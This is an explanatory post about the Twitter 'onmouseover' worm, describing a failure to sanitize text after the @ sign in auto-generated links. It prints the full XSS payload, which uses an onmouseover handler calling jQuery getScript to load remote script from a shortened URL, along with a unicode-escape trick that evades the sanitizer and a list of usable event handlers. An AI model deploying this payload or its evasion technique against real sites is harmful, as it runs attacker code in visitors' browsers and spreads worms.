How Twitter worm  "onmouseover" (and other ;) works.
This bug should be called "input sanitization" not "XSS" and not "onmouseover bug"


Usually twitter will sanitize user input like <html> tags so it won't change the page display or behavior.

When you tweet like in the twitter/ they will create the link (add <a href> tag for you)

But twitter forget to sanitize the link after @ symbol

This is when you tweet: http://www.google.com/ twitter will show like this:
################################################
<a href="http://www.google.com/">
http://www.google.com/
</a>
################################################




But when you tweet this:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/

twitter will show like this:
################################################
<a href="http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/">
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
</a>
################################################

Then normal link can become a very dangerous link

Notice that you can add a lot of thing to do with this like, but I'll explain what this worm do.


************************************
style="font-size:999999999999px;"
************************************
This to enlarge the font so it cover large area, then user can easy move thier mouse over it

************************************************************************
onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"
************************************************************************
This is tricky part, twitter.com uses jQuery JavaScript framework so life of hacker become much easiler
jQuery Function .getscript() use to load external javascript from any source

and \u002f is / symbol this also tricky to avoid twitter sanitizer to clean it out

so the real link of script is:
http://is.gd/fl9A7


List of JavaScript trigger that works with <a> tag:

onfocus, onblur, onclick, ondblclick, onmousedown, onmouseup, onmouseover, onmousemove, onmouseout, onkeypress, onkeydown, onkeyup 

Information about jQuery JavaScript Framework:
jQuery http://docs.jquery.com/Main_Page


- @anusoft